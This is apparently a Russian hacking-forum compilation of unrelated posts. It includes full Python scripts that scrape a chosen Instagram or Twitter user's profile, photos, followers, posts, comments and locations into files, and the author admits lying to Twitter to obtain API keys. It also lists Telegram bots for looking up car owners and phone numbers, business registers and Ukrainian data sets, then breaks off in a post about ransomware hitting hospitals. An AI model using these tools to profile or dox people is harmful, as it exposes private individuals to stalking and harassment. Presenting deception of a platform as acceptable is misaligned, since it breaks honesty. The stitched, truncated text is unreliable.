Из основных библиотек, будут использоваться следующее:
Тестирование и объяснение отдельных функций
Так как мы уже работаем с API, в этом скрипте будет использовать ключи, которые находятся во вкладке Apps>Details>Keys and tokens. Вставляем их в скрипт, и создаем переменную api:
Python:Copy to clipboard
cons_key = "XXXXXXXXXXXXXXXXXXXXXXXXX"
cons_sec_key = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
acc_tok = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
acc_tok_sec = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
api = TwitterAPI(cons_key, cons_sec_key, acc_tok, acc_tok_sec)
Функция main()
сразу создает запрос на получение информации об аккаунте и
создает словарь. Дальше, проверяет, существует ли такой аккаунт, и если он
существует: создает папку, и отправляет словарь в функцию info_about_acc()
Python:Copy to clipboard
def main(nick):
reqst = api.request("users/lookup", {"screen_name": nick})
jsn = json.loads(reqst.text)
try:
if jsn["errors"][0]["code"] == 17:
print("This page doesn't exist")
elif '""errors":' in reqst.text:
print("ERROR\nResponse data:", reqst.txt)
exit()
except:
os.mkdir("Twitter")
count, count_for_tweets = info_about_acc(jsn[0])
print("Downloading list of followers...")
followers(nick, "-1", [])
friends(nick, "-1", [])
getting_tweets(nick, [], 0, count_for_tweets, "")
getting_favorites(nick, count, 0, [], '')
Функция info_about_acc()
выглядит большой только из-за своих переменных, и
некоторых исключений. Основные цели функции – запись данных, взятых из словаря
в файл «Info.txt» и сохранение фотографий.
Python:Copy to clipboard
def info_about_acc(jsn):
print("Getting information...")
id = str(jsn["id"])
name = jsn["name"]
nickname = jsn["screen_name"]
followers = str(jsn["followers_count"])
friends = str(jsn["friends_count"])
data_of_creation = jsn["created_at"]
count_of_liked_tweets = jsn["favourites_count"]
verified = jsn["verified"]
profile_pic = jsn["profile_image_url_https"]
statuses_count = jsn["statuses_count"]
lang = jsn["lang"]
if lang is not None:
lang = "\nLang -" + lang
else:
lang = ''
location = jsn["location"]
if location != '':
location = "\nLocation -" + location
description = jsn["description"]
if description != '':
description = "\n\tDescription -" + description
print("Downloading photos...")
background_pic = jsn["profile_background_image_url"]
if background_pic is not None:
photo_back = requests.get(background_pic)
out_back = open("Twitter/Profile background photo.jpg", "wb")
out_back.write(photo_back.content)
out_back.close()
background_pic = '\nBackground picture - ' + background_pic
else:
background_pic = ''
if not jsn["profile_use_background_image"]:
banner_pic = jsn['profile_banner_url']
photo = requests.get(banner_pic)
out = open("Twitter/Profile banner.jpg", "wb")
out.write(photo.content)
out.close()
photo = requests.get(profile_pic.split("_normal")[0]+profile_pic.split("_normal")[1])
out = open("Twitter/Profile photo.jpg", "wb")
out.write(photo.content)
out.close()
print("Writing information to the file info.txt...")
info = "ID - " + id + "\nName - " + name + "\nNickname - " + nickname + "\nFollowers - " + followers + "\nFriends - " + friends+\
"\nData of creation - " + data_of_creation + "\nCount of liked twiters - " + str(count_of_liked_tweets) + "\nVerified - "+\
str(verified) + "\nStatuses count - " + str(statuses_count) + lang + location + description + background_pic + \
"\nProfile pic - " + profile_pic
file = open("Twitter/Info.txt", "w")
file.write(info)
file.close()
return count_of_liked_tweets, statuses_count
После этого, функция возвращает count_of_liked_tweets
(количество лайкнуты)
в переменную count
в функции main()
.
Далее, запускается функция followers()
Эта функция работает с подписчиками аккаунта. Создается запрос на загрузку данных о подписчиках, далее загруженная информация преобразуется в словарь, добавляется в переменную, и если нужна еще подзагрузка (об этом говорит параметр next_cursor):
Рисунок 26: Next_cursor
То создает еще:
Python:Copy to clipboard
if jsn["next_cursor"] != 0:
followers(nickname, jsn["next_cursor"], media_to_parse)
Как и в прошлом скрипте, передавая уже новые значения (media
, cursor
)
Python:Copy to clipboard
def followers(nickname, cursor, media_to_parse):
r = api.request("followers/list", {"cursor": cursor, "screen_name": nickname, "skip_status": "true",
"include_user_entities": "false", "count": "200"})
jsn = json.loads(r.text)
print(jsn)
media_to_parse += jsn["users"]
if jsn["next_cursor"] != 0:
followers(nickname, jsn["next_cursor"], media_to_parse)
else:
print("Got ", len(str(media_to_parse).split("'id': "))-1, " follower(s)")
print("Downloading list of followers...")
for i in range(len(str(media_to_parse).split("'id':"))-1):
parsing_followers_friends(media_to_parse[i], "Followers")
print("Done\n")
Функция friends()
работает с данными о друзьях. В Твиттере так называются
люди, на которых подписан указанный ранее аккаунт.
Так же как и во followers()
, сначала происходит создание запроса, создание
словаря, добавление в переменную.
Code:Copy to clipboard
def friends(nickname, cursor, media_to_parse):
r = api.request("friends/list", {"cursor": cursor, "screen_name": nickname, "skip_status": "true",
"include_user_entities": "false", "count": "200"})
jsn = json.loads(r.text)
media_to_parse += jsn["users"]
if jsn["next_cursor"] != 0:
friends(nickname, jsn["next_cursor"], media_to_parse)
else:
print("Got ", str(len(str(media_to_parse).split("'id': "))-1), " friend(s)")
print("Downloading list of friends...")
for i in range(len(str(media_to_parse).split("'id':"))-1):
parsing_followers_friends(media_to_parse[i], "Friends")
print("Done\n")
И если больше друзей нету, то есть next_cursor
равняется ‘’, то как в
функции followers()
, так и во friends()
переменная media, которая имеет в
себе весь список друзей/подписчиков, отправляется в функцию
parsing_followers_friends()
, где, в зависимости от friends_or_followers
,
функция решает куда сохранять файл. В функции followers()
, в функцию
отсылается строка “Followers”:
Python:Copy to clipboard
parsing_followers_friends(media_to_parse[i], [B]"Followers"[/B])
А в функции friends() – строка “Friends”:
Python:Copy to clipboard
parsing_followers_friends(media_to_parse[i], [B]"Friends"[/B])
После обработки последнего друга, функция friends()
окончена, и стартует
функция getting_tweets()
Данная функция собирает все твиты и ретвиты пользователя в одну переменную, и
в дальнейшем отправляется в функцию parsing_followers_friends()
:
Python:Copy to clipboard
def getting_tweets(nickname, media, count, statuses, max_id):
if max_id == "":
r = api.request("statuses/user_timeline", {"screen_name": nickname, "count": "200"})
else:
r = api.request("statuses/user_timeline", {"screen_name": nickname, "count": "200", "max_id": max_id})
jsn = json.loads(r.text)
media += jsn
count += 200
if statuses > count:
del media[-1]
getting_tweets(nickname, media, count, statuses, jsn[-1]["id_str"])
else:
print("Got "+str(len(media))+" tweet(s)")
print("Downloading tweets")
for i in range(len(media)):
parsing_tweets(media[i])
print("Done")
Так же стоит объяснить про странную строку del media[-1]. Дело в том, что при подзагрузке твитов/ретвитов, отсутствует такой курсор, как "next_page”, имеющийся в предыдущих функциях, и отследить, загрузились ли все твиты/ретвиты невозможно. Поэтому, пришлось придумывать велосипед, и использовать id последнего твита, как начало для загрузки следующего. Но из-за того, что один и тот же твит будет в конце и в начале, нужно удалять последний твит в общей переменной.
Твиттер также дает возможность просмотреть id тех пользователей, которые ретвитнули твит указанного аккаунта. Но так как, во-первых, лимит запросов составляет всего 300 в 15 минут:
Рисунок 27: Лимит на отправку запросов
а во-вторых на каждый id нужно создавать отдельный запрос, чтобы узнать информацию об аккаунте. Все указанные действия будут происходить медленно, с интервалом в 15 минут (если скрипт за 15 минут будет использовать больше 300 запросов). Из-за указанных особенностей, данная функция использоваться не будет.
По итогу, и собрав все твиты/ретвиты, весь полученный из словарей массив,
отправляется в parsin_tweets()
:
Python:Copy to clipboard
def parsing_tweets(tweet):
try:
author_nickname = tweet["retweeted_status"]["user"]["screen_name"]
author_name = tweet["retweeted_status"]["user"]["name"]
text = str(tweet["retweeted_status"]["text"])
link_to_tweet = "https://twitter.com/"+author_nickname+"/status/"+tweet["id_str"]
tweets_like = tweet["retweeted_status"]["favorite_count"]
tweets_retweet = tweet["retweeted_status"]["retweet_count"]
with open("Twitter/Retweets.txt", "a", encoding="utf-8") as file:
file.write(author_name+" (@"+author_nickname+")\n\t'"+text+"'\n\n\t"+str(tweets_retweet)+" Retweet(s) "+str(tweets_like)+" Like(s)"+"\n\n\tTweet - "+link_to_tweet+"\n\n"+"--"*25+"\n")
except:
text = tweet["text"]
data = tweet["created_at"]
likes = tweet["favorite_count"]
retweets = tweet["retweet_count"]
link_to_tweet = "https://twitter.com/" + tweet["user"]["screen_name"] + "/status/" + tweet["id_str"]
with open("Twitter/Tweets.txt", "a", encoding="utf-8") as file:
file.write("'"+text+"'\n\n\t"+data+"\t\t"+str(retweets)+" Retweet(s) "+str(likes)+
" Like(s)"+"\n\n\tTweet - "+link_to_tweet+"\n\n\n"+"--"*25+"\n")
file.close()
После создания переменных, полученные данные записываются в файл “Retweets.txt” и “Tweets.txt”.
И последняя функция имеет название getting_fevorites()
.
Она использует count (переменная из функции main()) для подсчета загруженных твитов.
Указанная функция схожа с предыдущей, единственное отличие - она вмещает в себе парсер, и не отправляет словарь из всех полученных твитов в отдельную функцию.
Лайкнутые твиты записывает в “Liked.txt”
После скана, получаем папку с такими файлами:
Рисунок 28 : полученные файлы после работы скрипта
Сравнение вариантов реализации OSINT скриптов
Каждый скрипт имеет свои плюсы и минусы. Прежде всего, использование API всегда позволяет взять больше информации, чем без его использования.
В Инстаграме, если пользователь не вошел в аккаунт – он не может смотреть Stories, список подписчиков и список друзей.
Но в то же время, мы никак не привязаны аккаунтом, и мы можем сканировать что угодно, и сколько угодно (до ошибки rate limiting)
В Твиттере мне пришлось открыто лгать про цели и идеи моего приложения. И не факт что вам удастся таким же образом получить эти ключи для пользования API.
Но другая сторона медали – сплошное удобство.
Вы можете сравнить функции в скрипте для Твиттера и для Инстаграма. Использование библиотеки решает многие вопросы, над которыми я долго сидел при написании скрипта для Инстаграма.
Заключение
Подводя итоги, хочу сказать, что каждый из этих скриптов является утилитой для OSINT, вне зависимости от использования API.
Более анонимный способ – первый, декомпиляция трафика и создание собственных запросов
Более простой – второй, взяв токены и ключи, следовать по документации от Твиттера.
Тут уже решать за вами.
Spoiler: Instagram
Python:Copy to clipboard
import requests
import argparse
import json
import time
import os
def parser():
parser = argparse.ArgumentParser(prog='OSINT Inst')
parser.add_argument("-n", "--nickname", help="Nickname?", dest="nickname")
args = vars(parser.parse_args())
main(args["nickname"])
def main(nickname):
url = "https://www.instagram.com/"+nickname
response = requests.get(url + "?__a=1")
if "Page Not Found" in response.text:
print("Page Not Found")
exit()
todos = json.loads(response.text)
os.mkdir("Instagram")
parse_page(todos)
photoes(todos["graphql"]["user"])
#getting links of the posts
def get_req_photo(media_to_parse, media, checker, json_media, idprofile_inst):
media_to_parse += str(media)
if checker:
end_cursor = json_media["edge_owner_to_timeline_media"]["page_info"]["end_cursor"]
data_for_get_req = 'https://www.instagram.com/graphql/query/?query_hash=f2405b236d85e8296cf30347c9f08c2a' \
'&variables=%7B%22id%22%3A%22' + idprofile_inst + \
'%22%2C%22first%22%3A50%2C%22after%22%3A%22' + end_cursor.split("==")[0] + '%3D%3D%22%7D'
gett = requests.get(data_for_get_req)
json_media = json.loads(gett.text)
checker = json_media["data"]["user"]["edge_owner_to_timeline_media"]["page_info"]["has_next_page"]
media = json_media["data"]["user"]["edge_owner_to_timeline_media"]["edges"]
get_req_photo(media_to_parse, media, checker, json_media["data"]["user"], idprofile_inst)
else:
print("Got ", len(str(media_to_parse).split("'shortcode': '")), " post(s)")
for i in range(1, len(str(media_to_parse).split("'shortcode': '"))):
link_to_page = str(media_to_parse).split("'shortcode': '")[i].split("',")[0]
req = requests.get("https://instagram.com/p/" + link_to_page + "/?__a=1")
json_page = json.loads(req.text)
parse_media(json_page["graphql"]["shortcode_media"], i)
print("Done")
def photoes(json_media):
media = json_media["edge_owner_to_timeline_media"]["edges"]
checker = json_media["edge_owner_to_timeline_media"]["page_info"]["has_next_page"]
idprofile_inst = json_media["id"]
get_req_photo('', media, checker, json_media, idprofile_inst)
#getting infos about account
def parse_page(todos):
print("Getting info about profile...")
follow_inst = str(todos["graphql"]["user"]["edge_follow"]["count"])
followed_by_inst = str(todos["graphql"]["user"]["edge_followed_by"]["count"])
content_inst = str(todos["graphql"]["user"]["edge_owner_to_timeline_media"]["count"])
biography = todos["graphql"]["user"]["biography"]
name = todos["graphql"]["user"]["full_name"]
username = todos["graphql"]["user"]["username"]
verified = str(todos["graphql"]["user"]["is_verified"])
fb = str(todos["graphql"]["user"]["connected_fb_page"])
business = str(todos["graphql"]["user"]["is_business_account"])
try:
link = "\nLink: "+ todos["graphql"]["user"]["external_link"]
except:
link = ''
file = open("Instagram/info.txt", "w", encoding="utf-8")
info = "Name: "+name+"\nUsername: "+username+"\nBiography: "+biography+"\n\nVerified: "+verified+"\nFollow: "+follow_inst+"\nFollowed: "+\
followed_by_inst+"\nNumber of posts: "+content_inst+link+"\nBusiness account: "+business+\
'\nConnected to facebook: '+fb
file.write(info)
file.close()
#functions for comments
def get_req_com(shortcode, comments, page_info, list_of_comments, m):
list_of_comments += str(comments)
if page_info["has_next_page"]:
end_cursor = page_info["end_cursor"]
data_for_get_req = 'https://www.instagram.com/graphql/query/?query_hash=f0986789a5c5d17c2400faebf16efd0d' \
'&variables=%7B%22shortcode%22%3A%22' + shortcode + '%22%2C%22first%22%3A50' \
'%2C%22after%22%3A%22' + end_cursor.split("==")[0] + '%3D%3D%22%7D'
get = requests.get(data_for_get_req)
json_media = json.loads(get.text)
try:
comments = json_media["data"]["shortcode_media"]["edge_media_to_comment"]["edges"]
page_info = json_media["data"]["shortcode_media"]["edge_media_to_comment"]["page_info"]
get_req_com(shortcode, comments, page_info, list_of_comments, m)
except Exception as e:
if json_media['message'] == "rate limited":
print("Rate limit. Please wait... (8 min.)")
time.sleep(480)
get_req_com(shortcode, comments, page_info, list_of_comments, m)
else:
print("Error:","\n",e,json_media)
pass
else:
comments = parse_comm(list_of_comments)
file = open("Instagram/post " + str(m) + "/comments.txt", "w", encoding="utf-8")
file.write(comments)
file.close()
with open("Instagram/all_comments.txt", "a", encoding="utf-8") as file_all_comments:
file_all_comments.write(comments)
def parse_comm(list_of_comments):
list = ''
num = str(list_of_comments).split("'node':")
for i in range(1, len(num)):
if str(num[i]).split("'edge_liked_by': {'count': ")[1].split("}")[0] == '0':
likes = ''
else:
likes = "\t" + str(num[i]).split("'edge_liked_by': {'count': ")[1].split("}")[0] + " like(s)"
username = "\n" + str(num[i]).split("'username': '")[1].split("'},")[0]
try:
text = str(num[i]).split("'text': '")[1].split("'")[0] + "'"
except:
text = str(num[i]).split(''''text': "''')[1].split('"')[0] + "'"
list += username + " '" + text +likes+"\n"
return list
def comm(json_page, m):
list_of_comments = ''
try:
try:
comments = json_page["edge_media_to_parent_comment"]["edges"]
page_info = json_page["edge_media_to_parent_comment"]["page_info"]
except KeyError:
comments = json_page["edge_media_to_comment"]["edges"]
page_info = json_page["edge_media_to_comment"]["page_info"]
except Exception as e:
print("\n\n", json_page,"\nError:", e)
exit()
get_req_com(json_page["shortcode"], comments, page_info, '', m)
#saving infos and photoes from account
def parse_media(json_page, m):
view_count = ''
os.mkdir("Instagram/post " + str(m))
captions = '\nCaption(s): '
print("Downloading post " + str(m))
if json_page["__typename"] == "GraphVideo":
view_count = str("\nView count = " + str(json_page["video_view_count"]))
out = open("Instagram/post " + str(m) + "/video.txt", "w")
out.write(str("https://instagram.com/p/"+json_page["shortcode"]))
out.close()
if json_page["__typename"] == "GraphImage":
photo = str(json_page["display_resources"][-1]["src"])
p = requests.get(photo)
out = open("Instagram/post " + str(m) + "/img" + str(m) + ".jpg", "wb")
out.write(p.content)
out.close()
captions = "\n"+json_page["accessibility_caption"]
if json_page["__typename"] == "GraphSidecar":
for i in range(len(json_page["edge_sidecar_to_children"]["edges"])):
photoes = json_page["edge_sidecar_to_children"]["edges"][i]["node"]["display_resources"][-1]["src"]
p = requests.get(photoes)
out = open("Instagram/post "+str(m)+"/img"+str(i)+".jpg", "wb")
out.write(p.content)
out.close()
try:
captions += "\nphoto №"+str(i)+"-"+ str(json_page["edge_sidecar_to_children"]["edges"][i]
["node"]["accessibility_caption"])+"\n"
except:
view_count = str("\nView count = " + str(json_page["edge_sidecar_to_children"]["edges"][i]
["node"]["video_view_count"]))
out = open("Instagram/post " + str(m) + "/video.txt", "w")
out.write(str("https://instagram.com/p/" + json_page["shortcode"]))
out.close()
likes = "\nlikes: " + str(json_page["edge_media_preview_like"]["count"])+"\n"
link = "Link - "+"instagram.com/p/"+json_page["shortcode"]+"\n"
location = json_page["location"]
if location is not None:
with open("Instagram/all_locations.txt", "a", encoding="utf-8") as file:
file.write("post "+str(m)+"\n"+str(location)+"\n")
else:
location = ''
pass
if json_page["edge_media_to_tagged_user"]["edges"] == []:
tagged_user = ''
else:
tagged = str(json_page["edge_media_to_tagged_user"]).split("node")
tagged_user = '\nTagged user(s): '
for i in range(1, len(tagged)):
tagged_user += "@"+str(json_page["edge_media_to_tagged_user"]).split("username': '")[i].split("'}")[0]+\
" ("+str(json_page["edge_media_to_tagged_user"]).split("full_name': '")[i].split("', ")[0]+")\n"
with open("Instagram/all_tagged.txt", "a", encoding="utf-8") as file:
file.write(str("post " + str(m) + ":" + tagged_user + "\n"))
file = open("Instagram/post "+str(m)+"/info.txt", "w", encoding="utf-8")
try:
text = "text: '"+str(json_page["edge_media_to_caption"]["edges"][0]["node"]["text"])+"'\n"
except:
text = "text: None\n"
all_information = str(text+likes+tagged_user+"\nLocation: "+str(location)+captions+view_count+"\n"+link)
file.write(all_information)
file.close()
try:
checker_for_comment = json_page["edge_media_to_parent_comment"]["count"]
except:
checker_for_comment = json_page["edge_media_to_comment"]["count"]
if checker_for_comment != 0:
comm(json_page, m)
else:
pass
if __name__ == '__main__':
parser()
Spoiler: Twitter
Python:Copy to clipboard
from TwitterAPI import TwitterAPI
import os
import json
import requests
cons_key = ""
cons_sec_key = "" #Put yours keys in
acc_tok = "" #these lines
acc_tok_sec = ""
api = TwitterAPI(cons_key, cons_sec_key, acc_tok, acc_tok_sec)
def main(nick):
reqst = api.request("users/lookup", {"screen_name": nick})
jsn = json.loads(reqst.text)
try:
if jsn["errors"][0]["code"] == 17:
print("This page doesn't exist")
elif '""errors":' in reqst.text:
print("ERROR\nResponse data:", reqst.txt)
exit()
except:
os.mkdir("Twitter")
count, count_for_tweets = info_about_acc(jsn[0])
print("Downloading list of followers...")
followers(nick, "-1", [])
friends(nick, "-1", [])
getting_tweets(nick, [], 0, count_for_tweets, "")
getting_favorites(nick, count, 0, [], '')
def parsing_tweets(tweet):
try:
author_nickname = tweet["retweeted_status"]["user"]["screen_name"]
author_name = tweet["retweeted_status"]["user"]["name"]
text = str(tweet["retweeted_status"]["text"])
link_to_tweet = "https://twitter.com/"+author_nickname+"/status/"+tweet["id_str"]
tweets_like = tweet["retweeted_status"]["favorite_count"]
tweets_retweet = tweet["retweeted_status"]["retweet_count"]
with open("Twitter/Retweets.txt", "a", encoding="utf-8") as file:
file.write(author_name+" (@"+author_nickname+")\n\t'"+text+"'\n\n\t"+str(tweets_retweet)+" Retweet(s) "+str(tweets_like)+" Like(s)"+"\n\n\tTweet - "+link_to_tweet+"\n\n"+"--"*25+"\n")
except:
text = tweet["text"]
data = tweet["created_at"]
likes = tweet["favorite_count"]
retweets = tweet["retweet_count"]
link_to_tweet = "https://twitter.com/" + tweet["user"]["screen_name"] + "/status/" + tweet["id_str"]
with open("Twitter/Tweets.txt", "a", encoding="utf-8") as file:
file.write("'"+text+"'\n\n\t"+data+"\t\t"+str(retweets)+" Retweet(s) "+str(likes)+
" Like(s)"+"\n\n\tTweet - "+link_to_tweet+"\n\n\n"+"--"*25+"\n")
file.close()
def getting_tweets(nickname, media, count, statuses, max_id):
if max_id == "":
r = api.request("statuses/user_timeline", {"screen_name": nickname, "count": "200"})
else:
r = api.request("statuses/user_timeline", {"screen_name": nickname, "count": "200", "max_id": max_id})
jsn = json.loads(r.text)
media += jsn
count += 200
if statuses > count:
del media[-1]
getting_tweets(nickname, media, count, statuses, jsn[-1]["id_str"])
else:
print("Got "+str(len(media))+" tweet(s)")
print("Downloading tweets")
for i in range(len(media)):
parsing_tweets(media[i])
print("Done")
def parsing_followers_friends(acc_to_parse, friends_or_followers):
name = acc_to_parse["name"]
nickname_of_user = acc_to_parse["screen_name"]
info = name +"\t(@"+nickname_of_user+")\n\n"
if friends_or_followers == "Friends":
with open("Twitter/Friends.txt", "a", encoding="utf-8",) as file:
file.write(info)
if friends_or_followers == "Followers":
with open("Twitter/Followers.txt", "a", encoding="utf-8",) as file:
file.write(info)
def friends(nickname, cursor, media_to_parse):
r = api.request("friends/list", {"cursor": cursor, "screen_name": nickname, "skip_status": "true",
"include_user_entities": "false", "count": "200"})
jsn = json.loads(r.text)
media_to_parse += jsn["users"]
if jsn["next_cursor"] != 0:
friends(nickname, jsn["next_cursor"], media_to_parse)
else:
print("Got ", str(len(str(media_to_parse).split("'id': "))-1), " friend(s)")
print("Downloading list of friends...")
for i in range(len(str(media_to_parse).split("'id':"))-1):
parsing_followers_friends(media_to_parse[i], "Friends")
print("Done\n")
def followers(nickname, cursor, media_to_parse):
r = api.request("followers/list", {"cursor": cursor, "screen_name": nickname, "skip_status": "true",
"include_user_entities": "false", "count": "200"})
jsn = json.loads(r.text)
print(jsn)
media_to_parse += jsn["users"]
if jsn["next_cursor"] != 0:
followers(nickname, jsn["next_cursor"], media_to_parse)
else:
print("Got ", len(str(media_to_parse).split("'id': "))-1, " follower(s)")
print("Downloading list of followers...")
for i in range(len(str(media_to_parse).split("'id':"))-1):
parsing_followers_friends(media_to_parse[i], "Followers")
print("Done\n")
def info_about_acc(jsn):
print("Getting information...")
id = str(jsn["id"])
name = jsn["name"]
nickname = jsn["screen_name"]
followers = str(jsn["followers_count"])
friends = str(jsn["friends_count"])
data_of_creation = jsn["created_at"]
count_of_liked_tweets = jsn["favourites_count"]
verified = jsn["verified"]
profile_pic = jsn["profile_image_url_https"]
statuses_count = jsn["statuses_count"]
lang = jsn["lang"]
if lang is not None:
lang = "\nLang -" + lang
else:
lang = ''
location = jsn["location"]
if location != '':
location = "\nLocation -" + location
description = jsn["description"]
if description != '':
description = "\n\tDescription -" + description
print("Downloading photos...")
background_pic = jsn["profile_background_image_url"]
if background_pic is not None:
photo_back = requests.get(background_pic)
out_back = open("Twitter/Profile background photo.jpg", "wb")
out_back.write(photo_back.content)
out_back.close()
background_pic = '\nBackground picture - ' + background_pic
else:
background_pic = ''
if not jsn["profile_use_background_image"]:
banner_pic = jsn['profile_banner_url']
photo = requests.get(banner_pic)
out = open("Twitter/Profile banner.jpg", "wb")
out.write(photo.content)
out.close()
photo = requests.get(profile_pic.split("_normal")[0]+profile_pic.split("_normal")[1])
out = open("Twitter/Profile photo.jpg", "wb")
out.write(photo.content)
out.close()
print("Writing information to the file info.txt...")
info = "ID - " + id + "\nName - " + name + "\nNickname - " + nickname + "\nFollowers - " + followers + "\nFriends - " + friends+\
"\nData of creation - " + data_of_creation + "\nCount of liked twiters - " + str(count_of_liked_tweets) + "\nVerified - "+\
str(verified) + "\nStatuses count - " + str(statuses_count) + lang + location + description + background_pic + \
"\nProfile pic - " + profile_pic
file = open("Twitter/Info.txt", "w")
file.write(info)
file.close()
return count_of_liked_tweets, statuses_count
def getting_favorites(nick, count, counter, media, max_id):
if max_id == '':
reqst = api.request("favorites/list", {"count": 200, "screen_name": nick})
else:
reqst = api.request("favorites/list", {"count": 200, "screen_name": nick, "max_id": max_id})
jsn = json.loads(reqst.text)
counter += 200
media += jsn
if count > counter:
del media[-1]
getting_favorites(nick, count, counter, media, jsn[-1]["id_str"])
else:
print("Got " + str(len(media)) + " Liked tweet(s)")
print("Downloading these tweets...")
for i in range(len(media) - 1):
text = media[i]["text"]
data = media[i]["created_at"]
likes = media[i]["favorite_count"]
retweets = media[i]["retweet_count"]
link_to_tweet = "https://twitter.com/" + media[i]["user"]["screen_name"] + "/status/" + media[i]["id_str"]
author_name = media[i]["user"]["name"]
author_nickname = media[i]["user"]["screen_name"]
with open("Twitter/Liked.txt", "a", encoding="utf-8") as file:
file.write(author_name + " ( @" + author_nickname + ")\n" + "\n'" + text + "'\n\n\t" + data + "\t\t"
+ str(retweets) + " Retweet(s) " + str(likes) + " Like(s)" + "\n\n\tTweet - " +
link_to_tweet + "\n\n\n" + "--" * 25 + "\n")
print("Done")
#write a nickname
if __name__ == '__main__':
main("")
Автор: @g00db0y
взято с codeby
Spoiler: Европейский бизнес-регистр
www.ebr.org/ - Он-лайн информация о Европейских компаниях. Доступ к информации осуществляется через одного из дистрибьюторов, указанных на сайте.
Европейский бизнес-регистр (EBR) www.lursoft.lv/?l=ru – это организация, которая объединяет системы регистров европейских предприятий. Ее цель – обеспечить обмен едиными базами данных предприятий в оперативном режиме. Европейский бизнес-реестр обеспечивает доступ в базу данных всех зарегистрированных в конкретном государстве предприятий, которая пополняется от первоисточника при помощи Интернета. По данной ссылке можно получить доступ к данным EBR через сайт Lursoftа - одного из его дистрибьюторов. www.globalbusinessregister.co.uk
Австрия:
Wiener Zeitung
www.firmenbuchgrundbuch.at
Бельгия:
www.eurodb.be
Босния и Герцеговина:
www.pksa.com.ba
Болгария:
www.investbulgaria.com
www.brra.bg - (большой объем информации и бесплатно)
Британские Вирджинские острова:
www.bvifsc.vg
Великобритания:
www.companieshouse.gov.uk
Венгрия:
Court of Company Registration
www.cegtalalo.hu
www.microsec.hu - доступ платный
Германия:
www.eogs.dk
www.unternehmensregister.de
Judicial register of the federal states
Гибралтар:
www.companieshouse.gi
www.gibraltar.gi
Греция:
www.acci.gr
Дания:
www.eogs.dk
Центральный коммерческий регистр
Джерси:
www.jerseyfsc.org
Ирландия:
www.cro.ie
Северная Ирландия:
www.detini.gov.uk
Исландия:
www.statice.is
Испания:
www.registradores.org
www.rmc.es
Италия:
www.infocamere.it
www.infoimprese.it
www.registroimprese.it
Кипр:
www.mcit.gov.cy
Латвия:
www.ur.gov.lv
www.lursoft.lv
Литва:
www.registrucentras.lt
Лихтенштейн:
www.llv.li
Люксембург:
www.rcsl.lu
saturn.etat.lu
Мальта:
registry.mfsa.com.mt
rocsupport.mfsa.com.mt
Нидерланды:
www.kvk.nl
OpenCompanies
Норвегия:
www.brreg.no
w2.brreg.no
Остров Мэн:
www.gov.im
Польша:
ms.gov.pl
Португалия:
www.irn.mj.pt
www.guianet.pt
Румыния:
www.onrc.ro
Сербия:
Serbian Business Registration Agency
Central Secuities Depository and Clearing House
Словакия:
www.orsr.sk
Финляндия:
www.prh.fi
www.ytj.fi
Чехия:
wwwinfo.mfcr.cz
portal.justice.cz
Хорватия:
www1.biznet.hr
Франция:
www.infogreffe.fr
www.inpi.fr
www.greffe-tc-paris.fr
Швейцария:
Swiss Commercial Gazette (SHAB) - публикуются новые записи и изменения в
торговом реестре.
Central Business Names Index
Швеция:
Swedish Companies Registration Office - Bolagsverket
www.prv.se
Foretagsinformation om alla Sveriges bolag
Эстония:
www.rik.ee
Spoiler: Боты телеграмм
@egrul_bot - данные из ЕГРЮЛ ФНС
@AntiParkonBot - данные о владельцах автомобилей
@shtraf_nalog_bot - штрафы ГИБДД и налоги
@AvinfoBot - сведения об автомобиле
@InsacarBot - сведения об автомобиле
@numberPhoneBot - сведения о номере телефона
@mnp_bot - сведения о номере телефона
@WhoisDomBot - сведения о домене
Spoiler: Украина
Бот телеграмм для поиска по Украинским открытым данным- @OpenDataUABot | Сайт -https://opendatabot.ua/blog
Для пошуку введіть будь-яку інформацію:
- код, назву чи адресу компанії
- ПІБ людини українською мовою
- податковий номер фізичної особи
- номер судової справи
- номер авто чи техпаспорта
- номер паспортаClick to expand...
Еще для поиска по данным Украины
![data.gov.ua](/proxy.php?image=https%3A%2F%2Fdata.gov.ua%2Fimages%2Fsharing- social%2Fsharing- social.jpg&hash=c244e384b5a5d42bf2b93f82ba3ac10c&return_error=1)
Набір містить дані для ідентифікації викрадених, втрачених, недійсних паспортів громадянина України
data.gov.ua
Реестр аппаратуры спутниковых радионавигационных систем
https://data.gov.ua/dataset/b7689525-8afb-4984-86c8-e35b3a6e504d
Сведения о транспортных средствах и их владельцах
https://data.gov.ua/dataset/06779371-308f-42d7-895e-5a39833375f0
Spoiler: РФ
Единный реестр Тур-операторов: https://www.russiatourism.ru/operators/
http://stat.customs.ru - данные по таможне РФ
База данных лицензий на образовательную деятельность, Санкт-Петербург
http://petersburgedu.ru/licenses/list/
Московская городская нотариальная палата: Розыск наследников
http://www.mgnp.info/razdel-dlya-naslednikov/rozysk-naslednikov/
Spoiler: Общие
http://webmii.com/ Позволяет отделить фейковые аккаунты в социальных сетях от настоящих. Сервис ищет ссылки на человека по имени и выдает его рейтинг «веб-видимости».
https://where-you.com - поиск по людям, в том числе РФ/СНГ, находи ВКонтакте и одноклассники
Приветствую.
Должно быть, многие из вас слышали о заражении вирусами-вымогателями множества больниц по всему миру. Такие инциденты довольно часто проскакивают в новостях последнее время. Отрасль здравоохранения является наиболее важной отраслью критической инфраструктуры. Помимо того, что, как правило, на слабо защищенных серверах мед. учреждений хранится конфиденциальная информация о состоянии здоровья больных, любое нарушение в работе оборудования может привести к человеческим жертвам. Поэтому, в данной отрасли, атаки вирусов-вымогателей, созданные с целью извлечения финансовой выгоды, являются высокоэффективными. Аварийное отключение оборудование может привести к потере доверия, денег и, конечно, плохой репутации больницы, не говоря уже о пациентах, которые находятся в опасности. Поэтому, персоналу ничего не остается, как заплатить киберпреступникам.
Голливудской больнице пришлось заплатить $17000 хакерам, запустившим вирус-
шифровальщик в компьютерную сеть учреждения /
https://habr.com/ru/post/390571/
В сети не так уж и много информации о реализации атак на эти клиники, но я
предполагаю, что киберпреступники получают доступ, используя фишинг или
популярные уязвимости, вроде Bluekeep, на компьютерах с включенным RDP. Помимо
этого, в американских клиниках активно используется сетевой протокол DICOM, в
купе с PACS.
Работу 10 больниц в США и Австралии нарушили атаки шифровальщиков /
https://xakep.ru/2019/10/03/ransomware-attacks-medical/
Помимо денежных доходов от шифрования данных, злоумышленники могут красть
конфиденциальную информацию о людях, их рентгеновские снимки, платежи и
